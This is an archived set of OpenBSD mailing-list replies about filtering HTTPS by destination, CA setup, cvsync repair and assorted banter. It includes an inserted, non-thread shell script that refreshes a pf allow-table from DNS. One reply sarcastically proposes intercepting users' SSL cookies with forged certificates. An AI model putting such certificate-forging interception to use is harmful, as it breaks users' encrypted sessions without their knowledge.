Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

2009-10-29 Thread Bob Beck
Yep. That's why https encrypts the url transmission.

The point is you aren't *supposed* to be able to do that securely.
Your reverse proxy which does this will look like the standard hotel
room silliness.


2009/10/29 Matthew Young myoung24...@gmail.com:
 Hello,

 If I use a reverse proxy I would have to know the SSL key of the
 remote SSL site. (gmail.com) so that the reverse proxy server would
 decrypt and encrypt. I am not mistaken.

 -- Matt

 On Thu, Oct 29, 2009 at 2:50 PM, Bob Beck b...@ualberta.ca wrote:
 apache or other reverse proxy.


 2009/10/29 Matthew Young myoung24...@gmail.com:
 Hello,


 I am looking for a way to have an allowed list of SSL enabled sites
 that an end user can browse, but this entirely done on a server level
 with _zero_ configuration on the pc.

 In a dream world, squid would be able to transparently proxy https and
 thus I would create  an allowed list of ssl sites specific to each LAN
 user (based on private IP or MAC) that he/she can access. As we know
 this isn't the case because this breaks SSL.

 Does anybody know a way I can actually accomplish this?

 My Thoughts:
 I thought of a way to then take my list of SSL enabled sites
 (gmail.com for example) and resolve the domain to an IP and then add
 it in a firewall so that X user has
 access to port 443 for only those specific IPs.  However the downside
 to this is that if gmail (or any other site i do this) changes the IP
 (which they will) the firewall rule which is static would need an
 update. Besides, gmail's https hostname resolves to the same IP as
 google.com A records so I would be fiddling with those at the same
 time and thus basically be allowing or disallowing the entire google
 domain when I truly really wanted just an access list of gmail.com.

 Would there be a way to make then some type of sniffer which would
 capture when users try to enter a https site and then somehow create a
 dynamic rule of some kind to let traffic out based on an allowed list?

 There must be a practical way, right guys?

 Thanks

 --Matt



Re: openbsd ca tutorial

2009-10-29 Thread Bob Beck
http://lmgtfy.com/?q=OpenSSL+set+up+own+Certificate+Authority

2009/10/29 Abdullah Sendul coffeesm...@gmail.com:
 Hi,

 I am trying to create my own CA on openbsd. but unfortunately couldn't
 find any tutorial on this, there are some on freebsd, linux, but they
 are giving some errors.

 can you please point me correct place if there is one.

 thanks

 \sendul



Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

2009-10-29 Thread Bob Beck
Not unless you know the ip addresses of everything you're hitting.  No
amount of magic will make relayd intercept an https session and get
the url out without sending a bogus certificate to the user.  If you
have a limited set of places to go, sure, it'll work, but so will just
a plain old pf rule restricting outbound 443 connections to the same
set of addresses.  Trying to do this for akamai type moving targets
will be an exercise in frustration though.

You could always just ensure all your users are using internet
explorer or firefox with all the whining turned off, and intercept the
ssl cookies anyway. Most of the users probably won't notice or will
click ok and simply blather along after clicking ok enough times to
make it accept the forgery.

2009/10/29 James Records james.reco...@gmail.com:
 may be able to do something with relayd, though i'm not sure.

 J

 On Thu, Oct 29, 2009 at 12:57 PM, Matthew Young myoung24...@gmail.com
 wrote:

 Hello,

 If I use a reverse proxy I would have to know the SSL key of the
 remote SSL site (gmail.com) so that the reverse proxy server would
 decrypt and encrypt, if I am not mistaken.

 -- Matt

 On Thu, Oct 29, 2009 at 2:50 PM, Bob Beck b...@ualberta.ca wrote:
  apache or other reverse proxy.
 
 
  2009/10/29 Matthew Young myoung24...@gmail.com:
  Hello,
 
 
  I am looking for a way to have an allowed list of SSL enabled sites
  that an end user can browse, but this entirely done on a server level
  with _zero_ configuration on the pc.
 
  In a dream world, squid would be able to transparently proxy https and
  thus I would create an allowed list of ssl sites specific to each LAN
  user (based on private IP or MAC) that he/she can access. As we know
  this isn't the case because this breaks SSL.
 
  Does anybody know a way I can actually accomplish this?
 
  My Thoughts:
  I thought of a way to then take my list of SSL enabled sites
  (gmail.com for example) and resolve the domain to an IP and then add
  it in a firewall so that X user has
  access to port 443 for only those specific IPs.  However the downside
  to this is that if gmail (or any other site I do this for) changes the IP
  (which they will) the firewall rule which is static would need an
  update. Besides, gmail's https hostname resolves to the same IP as
  google.com's A records so I would be fiddling with those at the same
  time and thus basically be allowing or disallowing the entire google
  domain when I truly wanted just an access list of gmail.com.
 
  Would there be a way to make then some type of sniffer which would
  capture when users try to enter a https site and then somehow create a
  dynamic rule of some kind to let traffic out based on an allowed list?
 
  There must be a practical way, right guys?
 
  Thanks
 
  --Matt
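
The "plain old pf rule" approach from the reply above, with the one piece the original poster was missing: the addresses do not have to be static in pf.conf if they live in a table that a small script refreshes from DNS. This is an added example, not code from the thread or from the OpenBSD project; the table name https_allow, the user network, the hostname list and the cron interval are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): keep a pf table of permitted
# HTTPS destinations refreshed from DNS.  Table/anchor names, the host
# list and the user subnet are assumptions for illustration.
#
# pf.conf side (assumed):
#   table <https_users> { 192.168.1.0/24 }
#   table <https_allow> persist
#   block out quick proto tcp to any port 443
#   pass out quick proto tcp from <https_users> to <https_allow> port 443
#
# Run from cron, e.g. every 10 minutes:  */10 * * * * /etc/https_allow.sh refresh
set -eu

ALLOWED_HOSTS="mail.google.com www.example.com"
TABLE=https_allow

# Pull IPv4 and IPv6 addresses out of host(1)-style output on stdin.
# "is an alias for" and "mail is handled by" lines are ignored.
addrs_from_host_output() {
    awk '/ has address / { print $NF }
         / has IPv6 address / { print $NF }'
}

# Resolve every allowed name; one address per line, deduplicated.
# A name that fails to resolve is skipped rather than aborting the run,
# so one dead host does not leave the table empty.
resolve_allowed() {
    for h in $ALLOWED_HOSTS; do
        host "$h" 2>/dev/null || true
    done | addrs_from_host_output | sort -u
}

# Replace the table contents atomically: -T replace swaps the whole
# address set in one operation, so there is no window where the table
# is half-populated and legitimate connections get blocked.
refresh_table() {
    tmp=$(mktemp)
    resolve_allowed > "$tmp"
    if [ -s "$tmp" ]; then
        pfctl -t "$TABLE" -T replace -f "$tmp"
    else
        echo "refusing to replace <$TABLE> with an empty set" >&2
    fi
    rm -f "$tmp"
}

case "${1:-}" in
    refresh) refresh_table ;;
esac
```

Two caveats that the thread already hints at and that no amount of scripting removes. First, this is an address filter, not a name filter: if gmail.com and google.com share front-end addresses, permitting one permits the other. Second, the addresses your resolver returns are not necessarily the ones a client sees, so pair this with a local resolver that all LAN clients are forced to use (redirect port 53 in pf) or the table will lag behind what browsers connect to.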



Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

2009-10-29 Thread Bob Beck
browsing ssl by IP addresses will also result in certificate conflicts
- because the ssl cert is for the name not the IP address.

So if they were willing to do that, they're willing to have your
stupid reverse proxy mitm all your certificates since they'll also
fail.

Perhaps between my extremely subtle taunting, I should give up and
just ask you *why* the hell do you want to do this?


2009/10/29 Matthew Young myoung24...@gmail.com:
 This is great, however our LAN users are all technical. They would
 know, and the next thing I have is people browsing the internet through
 IPs.

 It was good, but not applicable here.


 On Thu, Oct 29, 2009 at 3:11 PM, Chris Kuethe chris.kue...@gmail.com wrote:
 So run your own dns and only resolve good domains. Then the proxy can only
 find the things you want it to.

 On Oct 29, 2009 1:03 PM, Matthew Young myoung24...@gmail.com wrote:

 Hello,

 If I use a reverse proxy I would have to know the SSL key of the
 remote SSL site (gmail.com) so that the reverse proxy server would
 decrypt and encrypt, if I am not mistaken.

 -- Matt

 On Thu, Oct 29, 2009 at 2:50 PM, Bob Beck b...@ualberta.ca wrote:  apache
 or other reverse proxy...



Re: Secure way to delete data in hard disc

2009-10-28 Thread Bob Beck
 I would rather my family photos

Yeah, but I hike with bastards who take pictures of my ass and put it
up on the internet for all to see..   So how can I delete the data
from his web server? Is there some kind of remote bioctl --de-assify I
could run?



Re: Secure way to delete data in hard disc

2009-10-28 Thread Bob Beck
 What, you have pictures of my ass too?

Obviously I must make something to write a random pattern over my
entire ass so that it won't be recognized if some germans steal it.



Re: Secure way to delete data in hard disc

2009-10-28 Thread Bob Beck
2009/10/28 Henning Brauer lists-open...@bsws.de:
 * Bob Beck b...@openbsd.org [2009-10-28 20:57]:
  I would rather my family photos

 Yeah, but I hike with bastards who take pictures of my ass and put it
 up on the internet for all to see..   So how can I delete the data
 from his web server? Is there some kind of remote bioctl --de-assify I
 could run?

 yes:
 echo delete this pic of my ass: http:///; | mail -s asspic henning


What, you have pictures of my ass too?

:)



Re: CVSync problems?

2009-10-19 Thread Bob Beck
ahhh. Nick, you should not be depending on mirrors to run cvsync to do that.

Every time you pull the repository from me you should afterwards run a
cvscan..

cvscan -c /etc/cvsyncd.conf

which recreates the file correctly every time.

-Bob


2009/10/19 Nick Holland n...@holland-consulting.net:
 naddy@ told me the solution...

 cvsync keeps what it calls a scanfile, apparently tracking what versions
 it has of what files.  The file is specified in the cvsync config file you
 use when you run cvsync.  In my case, it was about 14M in size.  Rename that
 file, and re-run cvsync, it will recreate the file.  This run will probably
 take a little longer, but it fixed my problem nicely.  Naddy@ indicated that
 you may need to delete the gnu/gcc directory as well, but I don't seem to
 have needed to do that.

 It is POSSIBLE some mirrors might have this problem, in which case the
 mirror operator will need to do that, but my mirror (obsd.cec.mtu.edu)
 seems to have no cvsync problems itself, just my local copy was messed up.

 Nick.

 Nick Holland wrote:

 Emilio Perea wrote:

 There seems to be a problem with CVSync updates (at least
 anoncvs1.usa.openbsd.org and anoncvs3.usa.openbsd.org).  I believe this
 started about the time a large number of changes to gcc were made.

 After updating the tree with csup, run cvsync:

 I'm seeing a problem, too, starting evening of Oct 15:

 ...
  Create src/gnu/gcc/fixincludes/tests/base/time.h,v
  Create src/gnu/gcc/fixincludes/tests/base/tinfo.h,v
  Mkdir src/gnu/gcc/fixincludes/tests/base/types
 Failed

 (and failures ever since)

 However, my upstream mirror (which I help manage :) is not showing
 an error, and has been happily cvsyncing before and after.
 I'm still investigating what is going on...I'm guessing something
 got partly synced, and may need to be fixed somewhere, but not sure
 where yet.  I'm doing some testing, but it will take a while to
 give me any clues...

 Nick.



 - Forwarded message from Cron Daemon r...@hermes.walkereng.com
 -

 Date: 18 Oct 2009 13:30:01 -
 From: Cron Daemon r...@hermes.walkereng.com
 To: epe...@hermes.walkereng.com
 Subject: Cron epe...@hermes /home/eperea/Bin/cvsupdate

 Starting /home/eperea/Bin/cvsupdate: Sun Oct 18 08:30:01 CDT 2009
 Connecting to anoncvs3.usa.openbsd.org port 
 Connected to 192.43.244.161 port 
 Running...
 Updating (collection openbsd/rcs)
 /open/anoncvs/cvs/ports/databases/py-storm/patches/patch-test,v: No such
 file or directory
 Socket Error: send: Broken pipe
 Mux(SEND) Error: send
 FileScan(RCS): UPDATE
 /open/anoncvs/cvs/ports/devel/gconf-editor/Makefile,v
 FileScan: RCS Error
 Socket Error: recv: Connection reset by peer
 Receiver Error: recv
 Mux(RECV) Error: not running: 1
 Updater: RCS Error
 Mux(SEND) Error: not running: 0
 DirScan: RCS Error
 Failed
 Finished updating cvs: Sun Oct 18 08:30:33 CDT 2009

 - End forwarded message -

 Csup still runs without errors:

 - Forwarded message from Cron Daemon r...@hermes.walkereng.net
 -

 Date: 18 Oct 2009 13:45:01 -
 From: Cron Daemon r...@hermes.walkereng.net
 To: epe...@hermes.walkereng.net
 Subject: Cron epe...@hermes /home/eperea/Bin/old.cvsupdate

 Starting /home/eperea/Bin/cvsupdate: Sun Oct 18 08:45:01 CDT 2009
 Connected to 194.45.27.107
 Updating collection OpenBSD-all/cvs
  Append to CVSROOT/ChangeLog
  Append to CVSROOT/ChangeLog.37
  Append to CVSROOT/val-tags
  Edit ports/infrastructure/build/libtool,v
 Finished successfully
 Finished updating cvs: Sun Oct 18 08:47:56 CDT 2009

 - End forwarded message -



Re: Forum engine

2009-10-15 Thread Bob Beck
 ... how inexperienced web developers default to using MySQL because it
 has a lower barrier to entry, without considering if it's the right tool
 for the job or how to configure and secure it appropriately for
 production use.

s/MySQL/php/g
s/MySQL/asp/g
s/MySQL/JavaScript/g


s/inexperienced//g --- If there are *experienced* web developers -
they don't write the code.

Now you see.. the problem isn't the tools.. it's the Tools that are
using them. No, not all web developers are tools, but there's a vast
majority, so much so it's hard to find one that doesn't suck that
hasn't been assimilated into the Google collective or something
similar.


